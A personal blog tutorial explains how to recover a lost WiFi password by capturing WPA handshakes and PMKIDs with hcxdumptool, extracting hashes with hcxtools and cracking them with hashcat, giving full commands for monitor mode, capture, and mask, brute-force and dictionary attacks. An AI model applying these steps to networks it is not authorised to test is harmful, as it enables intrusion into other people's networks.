Recently I have been clumsy enough to lose the password of the shared WiFi. Unfortunately, as I did not get any mean to retrieve it and no access to the router, I had to get into it differently.
Disclaimer: You can use this knowledge for good things or bad things. In this blog post, we are speaking about retrieving access to your network. If you decide to use that knowledge for other purposes, this is merely your decision.
Today, we are going to see how to access a WiFi network when you have lost its password. It is one of the ways. There are many. This one worked pretty well because it is quick to obtain the initial data before to try to brute force the password.
For this article we are going to need:
- Git
- A Linux distribution ♥
- hcxdumptool
- hashcat
- hcxtools
- A good computer (or a lot of coffee)
Introduction
We have two tools, hcxdumptool and hashcat. The first one will listen to the network and capture packets. From these packets, we are going to get hashed data, and hashcat is going to help us brute force these hashed data.
The first way to obtain these data is to listen to someone connecting to the router. The authentication has four steps, and we know their structure.
An alternative way is an optional field, the RSN (Robust Security Network) PMKID.
The PMKID (Pairwise Master Key Identifier) contains a hash of the PMK (Pairwise Master Key) and it is what we want to retrieve.
In both cases, it is not possible to reverse a hash. Therefore, we are going to brute force the possibilities to obtain the same hash. When the two hashes match, it means that we found the password. And that we can gain access to the network.
We don't try all the possibilities by asking the router. The brute force operation is done locally. Therefore the router is not impacted by that action.
Installation
I am always used to copy source code of software I want to work with and that are not necessary to the system to run in the /opt/
folder, feel free to do the following operations in another folder, like your home folder, if you feel like it.
```sh
Move in the folder you want to keep the sources in.
cd /opt/
Let's retrieve the source code of the tools we need.
git clone https://github.com/ZerBea/hcxdumptool git clone https://github.com/hashcat/hashcat git clone https://github.com/ZerBea/hcxtools.git
Let's build them and install them
(cd hcxdumptool/ && make && sudo make install) (cd hashcat/ && make && sudo make install) (cd hcxtools/ && make && sudo make install) ```
Congratulations, you are now weaponized to try to access to any WiFi network, but of course, we are always going to use it on the network that we own.
Preparing the network interface
We need to prepare the network interface to monitor the network and be used by hcxdumptool.
During this phase you will loose internet. This blog is a WPA and content should be accessible offline. Therefore if you are lost please come back here!
First let's find your Wifi interface
shell
ifconfig |grep wl
wlp1s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
Here we can see that the interface is named wlp1s0.
We need to know if some software are going to interfere. To know you can just run hcxdumptool on the interface like that:
shell
sudo hcxdumptool -i wlp1s0
If you see lines similar to:
shell
initialization...
warning: NetworkManager is running with pid 19085
warning: wpa_supplicant is running with pid 19012
You need to deactivate the services, in my case:
shell
sudo service wpa_supplicant stop
sudo service NetworkManager stop
Now we are going to put it in monitor mode.
``` shell
Set interface down
sudo ip link set wlp1s0 down sudo iwconfig wlp1s0 mode monitor sudo ip link set wlp1s0 up ```
From now on, you should not have internet anymore, if at any moment you wish to stop the procedure, and restore the card to normal state, without having to reboot, simply execute:
shell
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode managed
sudo ip link set wlp1s0 up
sudo service wpa_supplicant start
sudo service NetworkManager start
Getting the password
Now we are going to capture the packets we need, and we are also going to do the brute force, these operations are going to let some files, so I would recommend moving to the /tmp/
folder.
shell
cd /tmp/
Let's capture packages. It is possible to filter the listening, but in our case we are going to listen to all frequencies and do the filtering later.
If you know which channel to listen to you can specify it with the -c
option.
If you want to look at the networks and their channels you can run:
shell
sudo hcxdumptool -i wlp1s0 --do_rcascan
```shell
Fullspectrum
sudo hcxdumptool -o capture.pcapng -i wlp1s0
Knowing the network is on channel 10
sudo hcxdumptool -o capture.pcapng -i wlp1s0 -c 10 ```
You should see something like: ``` initialization...
start capturing (stop with ctrl+c) INTERFACE................: wlp1s0 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: e8041029998e MAC ACCESS POINT.........: 000eef9848db (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 64629 ANONCE...................: 5128b8228c2be3c383be6615f4b81f01d168bda5389f3b74329c97cf1fa6baef
INFO: cha=11, rx=2642, rx(dropped)=1533, tx=245, powned=3, err=0 ```
Here the important information is the powned=3
value. It means that we have 3 networks that are sensible to our maneuver.
Let's take a tea for the next 10 minutes and press: ctrl+alt+c
.
Once done, we are going to extract from the capture the hashed data we can use for cracking the password.
shell
sudo hcxpcaptool capture.pcapng -z capture.16800 -o capture.2500 --network-out=network_hash_name
The -z
is to extract the PMKID and the -o
is to extract authentication from others.
This will produce three files:
- capture.16800
- capture.2500
- network_hash_name
To know if the network you want to retrieve the password for is vulnerable, there are two steps:
First check if the name of the network is not in the capture.2500 file:
shell
wlanhcxinfo -i capture.2500 -a -s -e| grep -a <name of the network>
The second step, if you didn't find your network yet, is to cat
the network_hash_name and match the corresponding hash to the capture.16800 file.
For example:
shell
cat network_hash_name
A list of the type: hash:network
name will appear, if the hash corresponding to your network is in the capture.16800 then it means that you will be able to attack it.
Easiest way to check without damaging your precious eyes:
shell
cat capture.16800|grep <hash>
If it is there congratulation, let's run the brute force and flex our GPUs. If not, it means that probably the PMKID method is not possible. Therefore the only solution is to run hcxdumptool longer and wait for someone to connect to the access point.
If like me you have an android phone with the Wifi password registered (But you can't retrieve it, thank you android), you can connect, and it will speed up significantly the process.
Unfortunately, I only have a laptop with an Intel GPU, and therefore the process is prolonged. Intel GPU and OpenCL also have troubles, and if you are in the same case, you are going to have to deactivate securities. (sounds fun isn't it?)
WARNING: If you receive a message about self test not working with an INTEL GPU/CPU you need to install the intel openCL runtime. Don't try to deactivate self test, it will not return any result in the end.
To install the intel compute runtime.
Here are the instructions you can find on their page:
shell
mkdir neo
cd neo
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-gmmlib_19.2.3_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-core_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-opencl_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-opencl_19.29.13530_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-ocloc_19.29.13530_amd64.deb
sudo dpkg -i *.deb
In my specific case, I recall the start of the password. So I used a brute force approach trying digits after ibiza131...
Now based on which file contains your network: ```shell
2500
hashcat -m 2500 -a 3 capture.2500 ibiza131?d?d?d --force --increment
16800
hashcat -m 16800 -a 3 capture.16800 ibiza131?d?d?d --force --increment ```
Here ?d
means a number, --increment
means it will try with various lengths, adding one extra character after exhausting the previous possibilities.
You will see something resembling:
shell
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: capture.2500
Time.Started.....: Tue Jul 30 01:05:07 2019 (18 secs)
Time.Estimated...: Tue Jul 30 01:05:25 2019 (0 secs)
Guess.Mask.......: ibiza131?d?d?d?d?d [13]
Guess.Queue......: 6/7 (85.71%)
Speed.#1.........: 5435 H/s (0.29ms) @ Accel:16 Loops:4 Thr:256 Vec:1
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 200000/200000 (100.00%)
Rejected.........: 0/200000 (0.00%)
Restore.Point....: 100000/100000 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ibiza13134373 -> ibiza13173737
Here you can see that we have recovered at least one.
You can check the value in the hashcat potfile:
shell
cat ~/.hashcat/hashcat.potfile
If I didn't recall the password at all. I could have done a pure brute force of the type: ```shell
2500
hashcat -m 2500 -a 3 capture.2500 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment
16800
hashcat -m 16800 -a 3 capture.16800 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment ```
In this case you can also do a dictionary attack.
```shell
2500
hashcat -m 2500 -a 0 capture.2500 --force my_list_of_passwords
16800
hashcat -m 16800 -a 0 capture.16800 --force my_list_of_passwords ```
You can find many lists of passwords here.
Okay that's all folks. Now that I got back internet I can post this article. Peace out!